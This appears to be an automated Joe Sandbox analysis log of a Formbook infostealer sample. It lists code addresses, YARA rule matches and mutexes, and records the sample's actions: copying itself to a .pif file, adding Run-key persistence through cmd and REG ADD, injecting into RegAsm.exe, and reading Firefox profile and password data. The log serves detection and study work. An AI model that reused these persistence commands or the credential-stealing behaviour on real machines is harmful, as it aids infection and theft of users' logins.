            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE12ED7_2_02FE12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5B2C07_2_02F5B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F452A07_2_02F452A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F8739A7_2_02F8739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2D34C7_2_02F2D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF132D7_2_02FF132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF70E97_2_02FF70E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFF0E07_2_02FFF0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEF0CC7_2_02FEF0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F470C07_2_02F470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0300B16B7_2_0300B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4B1B07_2_02F4B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2F1727_2_02F2F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F7516C7_2_02F7516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF16CC7_2_02FF16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F856307_2_02F85630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFF7B07_2_02FFF7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F314607_2_02F31460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFF43F7_2_02FFF43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_030095C37_2_030095C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDD5B07_2_02FDD5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF75717_2_02FF7571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEDAC67_2_02FEDAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDDAAC7_2_02FDDAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F85AA07_2_02F85AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE1AA37_2_02FE1AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB3A6C7_2_02FB3A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFFA497_2_02FFFA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF7A467_2_02FF7A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB5BF07_2_02FB5BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F7DBF97_2_02F7DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5FB807_2_02F5FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFFB767_2_02FFFB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F438E07_2_02F438E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAD8007_2_02FAD800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F499507_2_02F49950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5B9507_2_02F5B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD59107_2_02FD5910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F49EB07_2_02F49EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFFFB17_2_02FFFFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F41F927_2_02F41F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFFF097_2_02FFFF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFFCF27_2_02FFFCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB9C327_2_02FB9C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5FDC07_2_02F5FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF7D737_2_02FF7D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF1D5A7_2_02FF1D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F43D407_2_02F43D40
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_066A45D08_2_066A45D0
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_066AD0308_2_066AD030
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_066A766A8_2_066A766A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_066A76788_2_066A7678
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_066A6EE08_2_066A6EE0
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_0670ED188_2_0670ED18
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_067058108_2_06705810
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_0670B8988_2_0670B898
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_0673B45F8_2_0673B45F
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_06736BD88_2_06736BD8
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_067303A08_2_067303A0
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_067370188_2_06737018
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_067378E88_2_067378E8
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_06736CD08_2_06736CD0
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_067389C48_2_067389C4
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_067636D88_2_067636D8
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_067668588_2_06766858
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_067614E88_2_067614E8
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_06764DC08_2_06764DC0
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifCode function: 8_2_067600408_2_06760040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031F02C015_2_031F02C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0316010015_2_03160100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031B600015_2_031B6000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0319475015_2_03194750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317077015_2_03170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0316C7C015_2_0316C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0318C6E015_2_0318C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317053515_2_03170535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0316EA8015_2_0316EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0318696215_2_03186962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031729A015_2_031729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317284015_2_03172840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317A84015_2_0317A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031A889015_2_031A8890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031568B815_2_031568B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0319E8F015_2_0319E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03190F3015_2_03190F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031B2F2815_2_031B2F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031E4F4015_2_031E4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031EEFA015_2_031EEFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03162FC815_2_03162FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03170E5915_2_03170E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03182E9015_2_03182E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317AD0015_2_0317AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317ED7A15_2_0317ED7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03188DBF15_2_03188DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03178DC015_2_03178DC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0316ADE015_2_0316ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03170C0015_2_03170C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03160CF215_2_03160CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0315D34C15_2_0315D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031733F315_2_031733F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031752A015_2_031752A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0318B2C015_2_0318B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0318D2F015_2_0318D2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0315F17215_2_0315F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031A516C15_2_031A516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317B1B015_2_0317B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317B73015_2_0317B730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0316146015_2_03161460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317349715_2_03173497
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031B74E015_2_031B74E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0318FB8015_2_0318FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031ADBF915_2_031ADBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031E5BF015_2_031E5BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031E3A6C15_2_031E3A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317995015_2_03179950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0318B95015_2_0318B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0317599015_2_03175990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031DD80015_2_031DD800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031738E015_2_031738E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03171F9215_2_03171F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03179EB015_2_03179EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03173D4015_2_03173D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0318FDC015_2_0318FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_031E9C3215_2_031E9C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_03189C2015_2_03189C20
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\4Ear91jgQ7.pif 9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\4Ear91jgQ7.pif.pif 9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif 9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif 9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02FBF290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F87E54 appears 111 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 031DEA12 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 031B7E54 appears 97 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F2B970 appears 280 times
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2408
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2130989636.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 4Ear91jgQ7.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000000.2061403206.0000000000472000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameElaniabdv.exe4 vs 4Ear91jgQ7.exe
            Source: 4Ear91jgQ7.exeBinary or memory string: OriginalFilenameElaniabdv.exe4 vs 4Ear91jgQ7.exe
            Source: 4Ear91jgQ7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@105/17@12/5
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pifJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1128:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4212:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3792:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:576:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3008:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6476
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
            Source: C:\Windows\SysWOW64\findstr.exeFile created: C:\Users\user\AppData\Local\Temp\H0840I45
            Source: 4Ear91jgQ7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 4Ear91jgQ7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: findstr.exe, 00000012.00000003.2687575983.0000000003186000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2687454073.0000000003166000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000031B2000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2692313345.000000000318F000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.0000000003186000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 4Ear91jgQ7.exeReversingLabs: Detection: 13%
            Source: unknownProcess created: C:\Users\user\Desktop\4Ear91jgQ7.exe "C:\Users\user\Desktop\4Ear91jgQ7.exe"
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Desktop\4Ear91jgQ7.exe" "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
